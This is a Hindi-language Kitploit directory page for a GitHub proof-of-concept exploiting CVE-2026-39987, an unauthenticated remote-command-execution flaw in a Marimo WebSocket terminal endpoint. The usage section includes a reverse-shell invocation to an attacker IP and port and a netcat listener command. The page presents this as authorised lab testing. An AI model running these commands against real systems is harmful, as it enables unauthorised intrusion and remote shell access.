Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39987_RCE_PoC — CVE-2026-39987 के लिए Python proof-of-concept, जो remote command execution और reverse shell access प्राप्त करने के लिए unauthenticated WebSocket terminal endpoint का exploit करता है। | Kitploit
उपकरण/GitHubGitHub/mfahdk/cve-2026-39987_rce_poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubmfahdk/cve-2026-39987_rce_poc

CVE-2026-39987_RCE_PoC

CVE-2026-39987 के लिए Python proof-of-concept, जो remote command execution और reverse shell access प्राप्त करने के लिए unauthenticated WebSocket terminal endpoint का exploit करता है।

रिपॉजिटरी देखें
9घं 18मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-39987 — Marimo WebSocket RCE PoC

CVE-2026-39987 के लिए Proof of Concept, जो कमजोर WebSocket terminal endpoint के माध्यम से remote command execution को प्रदर्शित करता है।

अस्वीकरण: यह PoC केवल अधिकृत security testing और शैक्षिक उपयोग के लिए है। इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप स्वामी हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट अनुमति है।

विवरण

यह कमजोरी एक unauthenticated उपयोगकर्ता को एप्लिकेशन के WebSocket terminal endpoint के साथ इंटरैक्ट करने और दूर से कमांड निष्पादित करने की अनुमति देती है।

यह PoC कनेक्ट होता है:

root@kitploit:~
wss://<target>/terminal/ws

और WebSocket कनेक्शन के माध्यम से command execution को प्रदर्शित करता है।

इस PoC को विकसित/परीक्षण करते समय उपयोग किया गया लक्ष्य एक अधिकृत Hack The Box lab environment था।

आवश्यकताएँ

  • Python 3
  • websocket-client

आवश्यक लाइब्रेरी इंस्टॉल करें:

root@kitploit:~
pip3 install websocket-client

उपयोग

root@kitploit:~
python3 test.py <domain>

उदाहरण:

root@kitploit:~
python3 test.py somesite.com

यह PoC WebSocket कनेक्शन स्थापित करता है और एक परीक्षण कमांड निष्पादित करता है।

Reverse Shell

यह PoC एक reverse-shell विकल्प का भी समर्थन करता है:

root@kitploit:~
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>

उदाहरण:

root@kitploit:~
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444

PoC निष्पादित करने से पहले listener प्रारंभ करें:

root@kitploit:~
nc -lvnp 4444

तकनीकी विवरण

यह एप्लिकेशन authentication की आवश्यकता के बिना एक WebSocket terminal endpoint को उजागर करता है।

यह PoC:

  1. एक WebSocket कनेक्शन स्थापित करता है।
  2. TLS certificate verification को अक्षम करता है क्योंकि lab target एक self-signed certificate का उपयोग करता है।
  3. प्रारंभिक terminal prompt को consume करता है।
  4. WebSocket के माध्यम से एक कमांड भेजता है।
  5. परिणामी terminal output को पढ़ता है।

प्रारंभिक ws.recv() महत्वपूर्ण है क्योंकि कनेक्शन स्थापित करने के तुरंत बाद सर्वर shell prompt भेजता है।

टूल डाउनलोड करें